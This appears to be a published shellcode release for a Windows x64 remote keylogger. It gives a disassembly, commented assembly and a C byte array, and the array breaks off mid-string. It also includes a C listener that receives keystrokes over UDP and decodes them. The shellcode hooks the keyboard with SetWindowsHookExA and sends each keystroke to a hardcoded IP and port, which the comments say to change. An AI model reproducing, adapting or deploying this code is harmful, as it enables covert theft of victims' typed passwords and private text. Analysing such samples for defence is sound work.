/* # Title : Windows x64 Remote Keylogger (UDP) # size : 864 bytes # Author : Roziul Hasan Khan Shifat # Tested On : Windows 10 x64 pro # Date : 26-10-2018 # Email: shifath12@gmail.com */ /* keyl.obj: file format pe-x86-64 Disassembly of section .text: 0000000000000000 <_start>: 0: eb 1d jmp 1f 0000000000000002 <_init_>: 2: 48 31 d2 xor rdx,rdx 5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60] a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18] e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20] 12: 48 8b 30 mov rsi,QWORD PTR [rax] 15: 48 8b 06 mov rax,QWORD PTR [rsi] 18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20] 1c: 5b pop rbx 1d: 53 push rbx 1e: c3 ret 000000000000001f : 1f: e8 de ff ff ff call 2 <_init_> 0000000000000024 <_p2_>: 24: 52 push rdx 25: 52 push rdx 26: 4c 8d 3c 24 lea r15,[rsp] 2a: 48 83 ec 38 sub rsp,0x38 2e: 4c 8d 24 24 lea r12,[rsp] 32: 48 83 ec 58 sub rsp,0x58 36: 48 8d 3c 24 lea rdi,[rsp] 3a: 41 57 push r15 3c: 41 54 push r12 3e: 57 push rdi 3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548 46: 54 49 53 49: 50 push rax 4a: 48 31 c0 xor rax,rax 4d: 66 b8 cc 01 mov ax,0x1cc 51: 48 01 c3 add rbx,rax 54: 53 push rbx 55: 48 89 f1 mov rcx,rsi 58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92] 5f: 4d 31 c0 xor r8,r8 62: 41 b0 02 mov r8b,0x2 65: 49 89 f9 mov r9,rdi 68: ff d3 call rbx 6a: 41 5d pop r13 6c: 48 31 c0 xor rax,rax 6f: 50 push rax 70: 50 push rax 71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377 78: 32 2e 64 7b: 48 89 04 24 mov QWORD PTR [rsp],rax 7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c 86: 48 8d 0c 24 lea rcx,[rsp] 8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8] 8e: 48 83 ec 28 sub rsp,0x28 92: ff d6 call rsi 94: 48 96 xchg rsi,rax 96: 48 8d 4c 24 28 lea rcx,[rsp+0x28] 9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375 a1: ff d0 call rax a3: 48 89 c1 mov rcx,rax a6: 49 8d 55 8c lea rdx,[r13-0x74] aa: 4d 31 c0 xor r8,r8 ad: 41 b0 06 mov r8b,0x6 b0: 4c 8d 4f 10 lea r9,[rdi+0x10] b4: 41 ff d5 call r13 b7: 48 89 f1 mov rcx,rsi ba: 49 8d 55 e7 lea rdx,[r13-0x19] be: 4d 31 c0 xor r8,r8 c1: 41 b0 03 mov r8b,0x3 c4: 4c 8d 4f 40 lea r9,[rdi+0x40] c8: 41 ff d5 call r13 cb: 48 83 c4 38 add rsp,0x38 00000000000000cf <_p3_>: cf: 48 31 c9 xor rcx,rcx d2: 66 b9 98 01 mov cx,0x198 d6: 48 29 cc sub rsp,rcx d9: 48 83 c1 6a add rcx,0x6a dd: 48 8d 14 24 lea rdx,[rsp] e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40] e5: ff d3 call rbx e7: 48 31 c9 xor rcx,rcx ea: b1 02 mov cl,0x2 ec: 51 push rcx ed: 51 push rcx ee: 5a pop rdx ef: 41 58 pop r8 f1: 41 b0 11 mov r8b,0x11 f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48] f8: ff d3 call rbx fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax fe: 48 8b 1f mov rbx,QWORD PTR [rdi] 101: 48 31 c9 xor rcx,rcx 104: ff d3 call rbx 106: 41 c6 07 02 mov BYTE PTR [r15],0x2 10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db 111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1 118: 63 119: 4d 31 c9 xor r9,r9 11c: 41 51 push r9 11e: 41 51 push r9 120: 59 pop rcx 121: 5a pop rdx 122: b1 0d mov cl,0xd 124: 49 89 c0 mov r8,rax 127: b2 bc mov dl,0xbc 129: 4c 01 ea add rdx,r13 12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10] 130: ff d3 call rbx 0000000000000132 <_p4_>: 132: 49 8d 4c 24 08 lea rcx,[r12+0x8] 137: 48 31 d2 xor rdx,rdx 13a: 52 push rdx 13b: 52 push rdx 13c: 41 58 pop r8 13e: 41 59 pop r9 140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28] 144: ff d3 call rbx 146: 49 8d 4c 24 08 lea rcx,[r12+0x8] 14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30] 14f: ff d3 call rbx 151: 49 8d 4c 24 08 lea rcx,[r12+0x8] 156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38] 15a: ff d3 call rbx 15c: eb d4 jmp 132 <_p4_> 000000000000015e : 15e: 47 rex.RXB 15f: 65 74 4d gs je 1af 162: 6f outs dx,DWORD PTR ds:[rsi] 163: 64 75 6c fs jne 1d2 166: 65 48 61 gs rex.W (bad) 169: 6e outs dx,BYTE PTR ds:[rsi] 16a: 64 6c fs ins BYTE PTR es:[rdi],dx 16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx 172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261 179: 79 41 17b: 01 53 65 add DWORD PTR [rbx+0x65],edx 000000000000017c : 17c: 53 push rbx 17d: 65 74 57 gs je 1d7 180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f 187: 6f outs dx,DWORD PTR ds:[rsi] 188: 6f outs dx,DWORD PTR ds:[rsi] 189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41 18d: 01 43 61 add DWORD PTR [rbx+0x61],eax 190: 6c ins BYTE PTR es:[rdi],dx 191: 6c ins BYTE PTR es:[rdi],dx 192: 4e rex.WRX 193: 65 78 74 gs js 20a 196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi] 198: 6f outs dx,DWORD PTR ds:[rsi] 199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1 19d: 47 rex.RXB 19e: 65 74 4b gs je 1ec 1a1: 65 79 53 gs jns 1f7 1a4: 74 61 je 207 1a6: 74 65 je 20d 1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax 1ab: 74 4d je 1fa 1ad: 65 73 73 gs jae 223 1b0: 61 (bad) 1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx 1b8: 6e outs dx,BYTE PTR ds:[rsi] 1b9: 73 6c jae 227 1bb: 61 (bad) 1bc: 74 65 je 223 1be: 4d rex.WRB 1bf: 65 73 73 gs jae 235 1c2: 61 (bad) 1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax 1c9: 70 61 jo 22c 1cb: 74 63 je 230 1cd: 68 4d 65 73 73 push 0x7373654d 1d2: 61 (bad) 1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx 00000000000001d7 : 1d7: 57 push rdi 1d8: 53 push rbx 1d9: 41 53 push r11 1db: 74 61 je 23e 1dd: 72 74 jb 253 1df: 75 70 jne 251 1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi 1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65] 1e7: 74 01 je 1ea 1e9: 73 65 jae 250 1eb: 6e outs dx,BYTE PTR ds:[rsi] 1ec: 64 74 6f fs je 25e 1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx 00000000000001f0 : 1f0: 56 push rsi 1f1: 57 push rdi 1f2: 41 50 push r8 1f4: 52 push rdx 1f5: 41 51 push r9 1f7: 51 push rcx 1f8: 41 5b pop r11 1fa: 48 31 db xor rbx,rbx 1fd: 53 push rbx 1fe: 53 push rbx 1ff: 5a pop rdx 200: 58 pop rax 201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c] 204: 48 01 cb add rbx,rcx 207: b2 88 mov dl,0x88 209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1] 20c: 48 01 c8 add rax,rcx 20f: 48 31 d2 xor rdx,rdx 212: 52 push rdx 213: 52 push rdx 214: 52 push rdx 215: 41 58 pop r8 217: 41 59 pop r9 219: 41 5a pop r10 21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20] 21f: 4d 01 d8 add r8,r11 222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24] 226: 4d 01 d9 add r9,r11 229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c] 22d: 4d 01 da add r10,r11 230: 48 31 d2 xor rdx,rdx 233: 48 31 f6 xor rsi,rsi 236: 56 push rsi 237: 59 pop rcx 238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4] 23c: 4c 01 de add rsi,r11 23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8] 244: 48 31 c0 xor rax,rax 247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1] 24a: 48 ff c1 inc rcx 24d: 3c 01 cmp al,0x1 24f: 75 f6 jne 247 251: 48 ff c2 inc rdx 254: 51 push rcx 255: 48 ff c9 dec rcx 258: 48 87 f7 xchg rdi,rsi 25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi] 25d: 59 pop rcx 25e: 75 d3 jne 233 260: 48 ff ca dec rdx 263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8] 268: 48 01 cf add rdi,rcx 26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi 270: 48 31 db xor rbx,rbx 273: 53 push rbx 274: 58 pop rax 275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2] 27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4] 27e: 4c 01 d8 add rax,r11 281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp] 285: 48 89 03 mov QWORD PTR [rbx],rax 288: 48 83 c3 08 add rbx,0x8 28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx 290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10] 295: 48 ff cb dec rbx 298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx 29d: 48 31 d2 xor rdx,rdx 2a0: 48 39 d3 cmp rbx,rdx 2a3: 75 8e jne 233 2a5: 48 83 c4 18 add rsp,0x18 2a9: 5f pop rdi 2aa: 5e pop rsi 2ab: c3 ret 00000000000002ac <_proceed_>: 2ac: 48 83 ec 58 sub rsp,0x58 2b0: 41 50 push r8 2b2: 52 push rdx 2b3: 51 push rcx 2b4: 48 31 f6 xor rsi,rsi 2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548 2be: 54 49 53 00000000000002c1 : 2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1] 2c5: 48 ff c6 inc rsi 2c8: 49 39 c2 cmp r10,rax 2cb: 75 f4 jne 2c1 2cd: 48 83 c6 07 add rsi,0x7 2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1] 2d5: 48 8b 3b mov rdi,QWORD PTR [rbx] 2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8] 2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10] 2e0: 48 85 c9 test rcx,rcx 2e3: 75 68 jne 34d <_out_> 2e5: 48 31 db xor rbx,rbx 2e8: b3 01 mov bl,0x1 2ea: 48 c1 e3 08 shl rbx,0x8 2ee: 48 39 da cmp rdx,rbx 2f1: 75 5a jne 34d <_out_> 2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20] 2f7: 48 31 c9 xor rcx,rcx 2fa: b1 14 mov cl,0x14 2fc: ff d3 call rbx 2fe: 66 41 89 04 24 mov WORD PTR [r12],ax 303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20] 307: 48 31 c9 xor rcx,rcx 30a: b1 10 mov cl,0x10 30c: ff d3 call rbx 30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax 314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10] 319: 8b 03 mov eax,DWORD PTR [rbx] 31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax 320: 48 83 ec 58 sub rsp,0x58 324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8] 328: 41 54 push r12 32a: 5a pop rdx 32b: 4d 31 c9 xor r9,r9 32e: 41 51 push r9 330: 41 58 pop r8 332: 41 b0 10 mov r8b,0x10 335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15 33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8 33f: 49 83 e8 08 sub r8,0x8 343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50] 347: ff d3 call rbx 349: 48 83 c4 58 add rsp,0x58 000000000000034d <_out_>: 34d: 5a pop rdx 34e: 41 58 pop r8 350: 41 59 pop r9 352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18] 356: 48 31 c9 xor rcx,rcx 359: ff d3 call rbx 35b: 48 83 c4 58 add rsp,0x58 35f: c3 ret */ /* section .text global _start _start: jmp short p1 _init_: xor rdx,rdx mov rax,[gs:rdx+0x60] ; getting pointer of PEB structure mov rax,[rax+24] ;rax=PPEB->Ldr mov rax,[rax+32] ;Ldr->InMemoryOrderModuleList mov rsi,[rax] mov rax,[rsi] mov rsi,[rax+32] ;kernel32.dll base address pop rbx ;address of _p2_ push rbx ret; transferring execution control to _p2_ p1: call _init_ ;----------------------------------------------------------------------------------------------------- _p2_: push rdx push rdx lea r15,[rsp] sub rsp,56 lea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure ) sub rsp,88 lea rdi,[rsp] ; pointer to function address push r15 push r12 push rdi mov rax,'HEREITIS' push rax xor rax,rax mov ax,get_addr-_p2_ add rbx,rax ; address of get_addr push rbx ;reserving future use mov rcx,rsi lea rdx,[rbx-(get_addr-kernel32_func)] xor r8,r8 mov r8b,2 mov r9,rdi call rbx ;loading kernel32_func functions ;------------------------------------------------------------------------------------- pop r13 ;address of get_addr ;loading ws2_32.dll xor rax,rax push rax push rax mov rax,'ws2_32.d' mov [rsp],rax mov [rsp+8],word 'll' lea rcx,[rsp] mov rsi,[rdi+8] sub rsp,40 call rsi xchg rsi,rax ;---------------------------------------------------------- ;loading user32.dll lea rcx,[rsp+40] mov [rcx],dword 'user' call rax ;==================================== ;loading user32.dll functions mov rcx,rax lea rdx,[r13-(get_addr-user32_func)] xor r8,r8 mov r8b,6 lea r9,[rdi+16] ;user32.dll functions from 16 call r13 ;=================================== ;loading ws2_32.dll functions mov rcx,rsi lea rdx,[r13-(get_addr-ws2_32_func)] xor r8,r8 mov r8b,3 lea r9,[rdi+64] ;ws2_32.dll functions from 64 call r13 add rsp,56 ;===========================================All necessary functions are loaded. Time to proceed to main task ======================================== _p3_: xor rcx,rcx mov cx,408 sub rsp,rcx add rcx,106 lea rdx,[rsp] mov rbx,[rdi+64] ;WSAStartup() call rbx xor rcx,rcx mov cl,2 push rcx push rcx pop rdx pop r8 mov r8b,17 mov rbx,[rdi+72] ;socket() call rbx mov [rdi+8],rax ;SOCKET mov rbx,[rdi] ; GetModuleHandleA() xor rcx,rcx call rbx ;------------------------------------ mov [r15],byte 2 mov [r15+2],word 0x83db ;port change it mov [r15+4],dword 0x63c1a1c1 ;IP change it ;----------------------------------- xor r9,r9 push r9 push r9 pop rcx pop rdx mov cl,13 mov r8,rax mov dl,_proceed_-get_addr add rdx,r13 mov rbx,[rdi+16] ;SetWindowsHookExA() call rbx _p4_: lea rcx,[r12+8] xor rdx,rdx push rdx push rdx pop r8 pop r9 mov rbx,[rdi+40] ;GetMessageA() call rbx lea rcx,[r12+8] mov rbx,[rdi+48] ;TranslateMessage() call rbx lea rcx,[r12+8] mov rbx,[rdi+56] ;DispatchMessageA() call rbx jmp short _p4_ ;---------------------------------------------------------------------------------------- kernel32_func: db 'GetModuleHandleA',1,'LoadLibraryA',1 user32_func: db 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1 ws2_32_func: db 'WSAStartup',1,'socket',1,'sendto',1 get_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer db 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3 ;------------------------------------------------------------------------------------------------------------------- _proceed_: sub rsp,88 push r8 push rdx push rcx ;--------------------------------------------- xor rsi,rsi mov rax,'HEREITIS' find: mov r10,[rsp+rsi] inc rsi cmp r10,rax jne find add rsi,7 lea rbx,[rsp+rsi] mov rdi,[rbx] mov r12,[rbx+8] mov r15,[rbx+16] ;------------------------------------------------ test rcx,rcx jnz short _out_ xor rbx,rbx mov bl,1 shl rbx,8 cmp rdx,rbx jne short _out_ ;-------------------------------------------------------- mov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL) xor rcx,rcx mov cl,0x14 call rbx mov [r12],ax mov rbx,[rdi+32] ;GetKeyState(VK_SHIFT) xor rcx,rcx mov cl,0x10 call rbx mov [r12+2],ax ;------------------------------- ;sending keystrokes mov rbx,[rsp+16] mov eax,[rbx] mov [r12+4],eax ;Virtual key code sub rsp,88 mov rcx,[rdi+8] ;SOCKET push r12 pop rdx xor r9,r9 push r9 pop r8 mov r8b,16 mov [rsp+32],r15 mov [rsp+40],r8 sub r8,8 mov rbx,[rdi+80] call rbx add rsp,88 ;----------------------------------------------------------- _out_: pop rdx pop r8 pop r9 mov rbx,[rdi+24] xor rcx,rcx call rbx add rsp,88 ret */ /* //keylogger Handler #include #include #include #pragma pack(1) typedef struct key { short caps; short shift; DWORD vkcode; }KEYDATA; char * Determine(BOOL caps,BOOL shift,DWORD code) { char * key; switch (code) // SWITCH ON INT { case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break; case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break; case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break; case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break; case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break; case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break; case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break; case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break; case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break; case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break; case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break; case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break; case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break; case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break; case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break; case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break; case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break; case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break; case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break; case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break; case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break; case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break; case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break; case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break; case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break; case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break; // Sleep Key case VK_SLEEP: key = "[SLEEP]"; break; // Num Keyboard case VK_NUMPAD0: key = "0"; break; case VK_NUMPAD1: key = "1"; break; case VK_NUMPAD2 : key = "2"; break; case VK_NUMPAD3: key = "3"; break; case VK_NUMPAD4: key = "4"; break; case VK_NUMPAD5: key = "5"; break; case VK_NUMPAD6: key = "6"; break; case VK_NUMPAD7: key = "7"; break; case VK_NUMPAD8: key = "8"; break; case VK_NUMPAD9: key = "9"; break; case VK_MULTIPLY: key = "*"; break; case VK_ADD: key = "+"; break; case VK_SEPARATOR: key = "-"; break; case VK_SUBTRACT: key = "-"; break; case VK_DECIMAL: key = "."; break; case VK_DIVIDE: key = "/"; break; // Function Keys case VK_F1: key = "[F1]"; break; case VK_F2: key = "[F2]"; break; case VK_F3: key = "[F3]"; break; case VK_F4: key = "[F4]"; break; case VK_F5: key = "[F5]"; break; case VK_F6: key = "[F6]"; break; case VK_F7: key = "[F7]"; break; case VK_F8: key = "[F8]"; break; case VK_F9: key = "[F9]"; break; case VK_F10: key = "[F10]"; break; case VK_F11: key = "[F11]"; break; case VK_F12: key = "[F12]"; break; case VK_F13: key = "[F13]"; break; case VK_F14: key = "[F14]"; break; case VK_F15: key = "[F15]"; break; case VK_F16: key = "[F16]"; break; case VK_F17: key = "[F17]"; break; case VK_F18: key = "[F18]"; break; case VK_F19: key = "[F19]"; break; case VK_F20: key = "[F20]"; break; case VK_F21: key = "[F22]"; break; case VK_F22: key = "[F23]"; break; case VK_F23: key = "[F24]"; break; case VK_F24: key = "[F25]"; break; // Keys case VK_NUMLOCK: key = "[NUM-LOCK]"; break; case VK_SCROLL: key = "[SCROLL-LOCK]"; break; case VK_BACK: key = "[BACK]"; break; case VK_TAB: key = "[TAB]"; break; case VK_CLEAR: key = "[CLEAR]"; break; case VK_RETURN: key = "[ENTER]"; break; case VK_SHIFT: key = "[SHIFT]"; break; case VK_CONTROL: key = "[CTRL]"; break; case VK_MENU: key = "[ALT]"; break; case VK_PAUSE: key = "[PAUSE]"; break; case VK_CAPITAL: key = "[CAP-LOCK]"; break; case VK_ESCAPE: key = "[ESC]"; break; case VK_SPACE: key = "[SPACE]"; break; case VK_PRIOR: key = "[PAGEUP]"; break; case VK_NEXT: key = "[PAGEDOWN]"; break; case VK_END: key = "[END]"; break; case VK_HOME: key = "[HOME]"; break; case VK_LEFT: key = "[LEFT]"; break; case VK_UP: key = "[UP]"; break; case VK_RIGHT: key = "[RIGHT]"; break; case VK_DOWN: key = "[DOWN]"; break; case VK_SELECT: key = "[SELECT]"; break; case VK_PRINT: key = "[PRINT]"; break; case VK_SNAPSHOT: key = "[PRTSCRN]"; break; case VK_INSERT: key = "[INS]"; break; case VK_DELETE: key = "[DEL]"; break; case VK_HELP: key = "[HELP]"; break; // Number Keys with shift case 0x30: key = shift ? ")" : "0"; break; case 0x31: key = shift ? "!" : "1"; break; case 0x32: key = shift ? "@" : "2"; break; case 0x33: key = shift ? "#" : "3"; break; case 0x34: key = shift ? "$" : "4"; break; case 0x35: key = shift ? "%" : "5"; break; case 0x36: key = shift ? "^" : "6"; break; case 0x37: key = shift ? "&" : "7"; break; case 0x38: key = shift ? "*" : "8"; break; case 0x39: key = shift ? "(" : "9"; break; // Windows Keys case VK_LWIN: key = "[WIN]"; break; case VK_RWIN: key = "[WIN]"; break; case VK_LSHIFT: key = "[SHIFT]"; break; case VK_RSHIFT: key = "[SHIFT]"; break; case VK_LCONTROL: key = "[CTRL]"; break; case VK_RCONTROL: key = "[CTRL]"; break; // OEM Keys with shift case VK_OEM_1: key = shift ? ":" : ";"; break; case VK_OEM_PLUS: key = shift ? "+" : "="; break; case VK_OEM_COMMA: key = shift ? "<" : ","; break; case VK_OEM_MINUS: key = shift ? "_" : "-"; break; case VK_OEM_PERIOD: key = shift ? ">" : "."; break; case VK_OEM_2: key = shift ? "?" : "/"; break; case VK_OEM_3: key = shift ? "~" : "`"; break; case VK_OEM_4: key = shift ? "{" : "["; break; case VK_OEM_5: key = shift ? "|" : "\\"; break; case VK_OEM_6: key = shift ? "}" : "]"; break; case VK_OEM_7: key = shift ? "\"" : "'"; break; //TODO: Escape this char: " // Action Keys case VK_PLAY: key = "[PLAY]";break; case VK_ZOOM: key = "[ZOOM]";break; case VK_OEM_CLEAR: key = "[CLEAR]";break; case VK_CANCEL: key = "[CTRL-C]";break; default: key = "[UNK-KEY]";break; } return key; } int main() { int port; SOCKET s; struct sockaddr_in sr,cr; WSADATA wsa; KEYDATA keystrk; char * n; printf("Enter Port Number To Listen: "); scanf("%d",&port); if(WSAStartup(514,&wsa)) { printf("WSAStartup() Failed"); return 0; } if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) { printf("Failed To Create Socket..."); return 0; } ZeroMemory(&sr,16); sr.sin_family=AF_INET; sr.sin_port=htons(port); if(bind(s,(struct sockaddr *)&sr,16)) { printf("Failed To Bind.."); return 0; } port=16; //Why bother to declare a variable for int * fromlen while(1) { recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port); n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode); printf("%s",n); } return 0; } */ #include #include #include #include char shellcode[]="\xeb\x1d\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x30\x48\x8b\x06\x48\x8b\x70\x20\x5b\x53\xc3\xe8\xde\xff\xff\xff\x52\x52\x4c\x8d\x3c\x24\x48\x83\xec\x38\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x8d\x3c\x24\x41\x57\x41\x54\x57\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x50\x48\x31\xc0\x66\xb8\xcc\x01\x48\x01\xc3\x53\x48\x89\xf1\x48\x8d\x93\x6e\xff\xff\xff\x4d\x31\xc0\x41\xb0\x02\x49\x89\xf9\xff\xd3\x41\x5d\x48\x31\xc0\x50\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x8b\x77\x08\x48\x83\xec\x28\xff\xd6\x48\x96\x48\x8d\x4c\x24\x28\xc7\x01\x75\x73\x65\x72\xff\xd0\x48\x89\xc1\x49\x8d\x55\x8c\x4d\x31\xc0\x41\xb0\x06\x4c\x8d\x4f\x10\x41\xff\xd5\x48\x89\xf1\x49\x8d\x55\xe7\x4d\x31\xc0\x41\xb0\x03\x4c\x8d\x4f\x40\x41\xff\xd5\x48\x83\xc4\x38\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x83\xc1\x6a\x48\x8d\x14\x24\x48\x8b\x5f\x40\xff\xd3\x48\x31\xc9\xb1\x02\x51\x51\x5a\x41\x58\x41\xb0\x11\x48\x8b\x5f\x48\xff\xd3\x48\x89\x47\x08\x48\x8b\x1f\x48\x31\xc9\xff\xd3\x41\xc6\x07\x02\x66\x41\xc7\x47\x02\xdb\x83\x41\xc7\x47\x04\xc1\xa1\xc1\x63\x4d\x31\xc9\x41\x51\x41\x51\x59\x5a\xb1\x0d\x49\x89\xc0\xb2\xbc\x4c\x01\xea\x48\x8b\x5f\x10\xff\xd3\x49\x8d\x4c\x24\x08\x48\x31\xd2\x52\x52\x41\x58\x41\x59\x48\x8b\x5f\x28\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x30\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x38\xff\xd3\xeb\xd4\x47\x65\x74\x4d\x6f\x64\x75\x6c\x65\x48\x61\x6e\x64\x6c\x65\x41\x01\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x01\x53\x65\x74\x57\x69\x6e\x64\x6f\x77\x73\x48\x6f\x6f\x6b\x45\x78\x41\x01\x43\x61\x6c\x6c\x4e\x65\x7